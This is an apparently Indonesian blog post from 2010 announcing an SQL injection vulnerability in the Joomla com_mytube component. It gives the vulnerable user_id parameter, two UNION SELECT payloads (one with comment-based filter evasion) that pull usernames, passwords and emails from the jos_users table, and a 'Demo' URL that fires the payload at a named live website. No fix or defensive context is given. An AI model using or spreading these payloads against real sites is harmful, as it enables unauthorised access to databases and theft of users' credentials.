Jumat, 19 Maret 2010

Joomla Component com_mytube SQLi Vuln

Joomla Component com_mytube SQLi Vulnerability (id)

[ Vulnerable File ]

http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck

[ XpL ]

69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,group_concat
(username,0x3a,password,0x3a,email,0x3c62723e),14, 15,16,17,18,19,20,21,
22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

69/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,GROUP_CONCAT
(username,0x3a,password,0x3a,email,0x3c62723e),14, 15,16,17,18,19,20,21,
22,23,24,25,26/**/FROM/**/jos_users--&option=com_mytube&Itemid=r3m1ck

[ Demo ]

http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

Tidak ada komentar:

Posting Komentar